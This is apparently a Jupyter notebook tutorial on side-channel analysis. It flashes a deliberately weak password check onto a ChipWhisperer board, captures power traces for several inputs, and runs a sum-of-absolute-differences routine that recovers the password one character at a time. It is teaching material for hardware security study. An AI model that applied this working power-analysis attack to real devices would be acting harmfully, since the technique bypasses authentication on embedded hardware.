# Attack a password check

#### Learning goals:
- Learn how a "bad" password check looks like
- Learn how to run code from C files on ChipWhisperer
- Learn how to read output from ChipWhisperer
- Learn how to exploit different program flows
- Learn how a SAD attack works

In [ ]:
%load_ext autoreload
%autoreload 2

import os
from pathlib import Path

import plotly.graph_objects as pgo
from cwtoolbox import CaptureDevice

In [ ]:
# Create a capture device, compile and flash target application

device = CaptureDevice.create("CWLITEXMEGA")
device.compile(file=str(Path("passwordcheck.c").resolve()))
device.flash()

In [ ]:
# Capture one trace with input b"helloinfineon"

def input_data(index):
    return b"helloinfineon"

trace = device.capture(
    number_of_traces=1,
    input=input_data,
    number_of_samples=1000
)

In [ ]:
# Plot the first captured trace
fig = pgo.Figure()
fig.add_trace(pgo.Scatter(y=trace["trace"][0]))
fig.show()

In [ ]:
# Capture traces with different inputs

def input_data(index):
    data = [
        b"helloinfineon",
        b"ifx-hello    ",
        b"in...........",
        b"inabcdefghijk",
        b"inf..........",
    ]
    return data[index]

trace = device.capture(
    number_of_traces=5,
    input=input_data,
    number_of_samples=1000
)

In [ ]:
# Plot all recorded traces

fig = pgo.Figure()
for i in range(len(trace)):
    fig.add_trace(pgo.Scatter(y=trace["trace"][i], name=str(bytes(trace["input"][i]))))
fig.update_layout(title="Recorded Traces", xaxis_title="Sample Index", yaxis_title="Amplitude")
fig.show()

In [ ]:
# Plot all traces and shift each trace by 0.5 down

fig = pgo.Figure()
for i in range(len(trace)):
    fig.add_trace(pgo.Scatter(y=trace["trace"][i] - i * 0.5, name=str(bytes(trace["input"][i]))))
fig.update_layout(title="Recorded Traces", xaxis_title="Sample Index", yaxis_title="Amplitude")
fig.show()

We see that with each additional matching character the significant spot moves to the right.

In [ ]:
def sad(trace1, trace2) -> float:
    """Sum of absolute differences"""
    return sum(abs(trace1 - trace2))

In [ ]:
# Plot the differences in the traces

# Use first recorded trace as bases
# base_trace = {"trace": [...], "input": [...]}
base_trace = trace[2]

fig = pgo.Figure()
for i in range(len(trace)):
    fig.add_trace(
        pgo.Scatter(
            # Plot the absolute difference of two traces
            y=abs(base_trace["trace"] - trace["trace"][i]) - i * 0.5,
            name=str(bytes(base_trace["input"]))
            + " - "
            + str(bytes(trace["input"][i]))
            + " sad = " + str(sad(base_trace["trace"], trace["trace"][i]))
        )
    )
fig.update_layout(
    title="Recorded Traces", xaxis_title="Sample Index", yaxis_title="Amplitude"
)
fig.show()

We recognize:
- The SAD value is "big" if two traces differ in the amount of correct characters.
- The SAD value is "small" if two traces are equal in the amount of correct characters independent of the other characters.

In [ ]:
# Attack using the SAD value
# Assume:
# - The password consists only of string.ascii_lowercase
# - The password is 8 characters long
# - Use sad threshold from values above

import string


def record_attempt(attempt: str):
    return device.capture(
        number_of_traces=1,
        number_of_samples=1000,
        input=lambda _: attempt.encode(),
    )["trace"][0]


def sad_attack(
    characters=string.ascii_lowercase,
    threshold=30,
    password_length=8,
    wrong_character=" ",
):
    # 1. Record base_trace. All characters wrong!
    # 2. Iterate over characters
    # 2a. Construct new guess by appending current character to
    #     already revealed part.
    # 2b. If sad between guess trace and base_trace is bigger than threshold:
    #     add current character to revealed part.
    # 3. Record new base_trace with already revealed password and wrong character.

    already_revealed = ""

    base_trace = record_attempt(password_length * wrong_character)

    for _ in range(password_length):
        for character in characters:
            current_guess = already_revealed + character
            guess_trace = record_attempt(current_guess)
            print(
                "already_revealed:",
                already_revealed,
                "current_guess:",
                current_guess,
                "sad:",
                sad(base_trace, guess_trace),
            )
            if sad(base_trace, guess_trace) > threshold:
                print("\nNEW REVEALED CHARACTER ", character, "\n")
                already_revealed += character
                base_trace = record_attempt(already_revealed + wrong_character)
                break

    return already_revealed


sad_attack()